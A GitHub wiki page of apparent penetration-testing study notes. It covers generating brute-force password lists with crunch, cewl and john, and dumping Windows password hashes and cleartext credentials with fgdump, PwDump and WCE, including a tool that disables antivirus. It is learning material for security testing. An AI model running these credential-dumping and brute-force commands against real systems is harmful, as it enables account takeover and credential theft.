Skip to content

Password file

lethanhtung01011980 edited this page Jun 18, 2020 · 27 revisions

Goals

1. Generate random password files to bruce force

No shell or remote code execution yet.

Generate password file

  • Sample password files: /usr/share/wordlists/.

  • Esp /usr/share/wordlists/dirbuster/

  • Charset is at less /usr/share/crunch/charset.lst

  • crunch min-chars max-chars allow-charset -o output.txt. crunch 6 6 0123456789ABCDEF -o crunch1.txt

  • Pre-defined character-set: crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha -o crunch1.txt

  • With fixed Morris at the beginning: crunch 11 11 -o jail-wlist.txt -f /usr/share/crunch/charset.lst symbols-all -t Morris1962@

Special charater placeholders

  • crunch 8 8 -t ,@@^^%%%: [Capital Letter] [2 x lower case letters] [2 x special chars] [3 x numeric] image

2. Generate "guessed" / "mutated" password file

Password profile: To get common words from website

  • (Tested) Generate simple word file: cewl 10.10.10.46 > list.txt
  • Min words 6: cewl xyz.com -m 6 -w pwd-profile.txt

Password mutation: To mix guessed words from password profile with random words

  • Change the config file of "john": vim /etc/john/john.conf image
  • Generate mixed passwords: john --wordlist=pwd-profile.txt --rules --stdout > mutated.txt

3. Attempt to get clear text or hashes

Already got shell or remote code execution.

3.1 Get Windows password hash - FgDump

In-memory attack to get password hash

  • Pwdump: /usr/share/windows-binaries/fgdump/PwDump.exe
  • fgdump: Pwdump + Kill local antivirus. /usr/share/windows-binaries/fgdump/fgdump.exe

Use "type" to view the file

  • type 127.0.0.1.pwdump

3.2 Get Windows Cleartext password - WCE

Not working in WinXP. To obtain clear text password and hashes from DLL files or memory

  • /usr/share/wce/wce32.exe
  • /usr/share/wce/wce64.exe
  • /usr/share/wce/wce-universial.exe
  • To dump cleartext passwords: wce-universial.exe -w
  • To list all the hashes of all users: wce32.exe -h
  • Retrieving the NTLM hash: wce32.exe -g <password>

Sidebar

0. COMMON exploits

1. Scan Info

1.2 Passive Gathering

1.3 Active Gathering

2. Pre-attack

2.2 File transfer

3. Get Reverse Shell

4. Exploits

4.2 Windows Exploits

4.3 Linux Exploits

4.4 Password crack

4.5 Buffer Overflow

4.6 Web attacks

6. Escalate Privilege

6.1 Escalate in Windows

6.2 Escalate in Linux

7. Access and further attacks

8. Port redirection and Tunnelling

9. Metasploit

10. Kali

11. Thirdparty scripts

Clone this wiki locally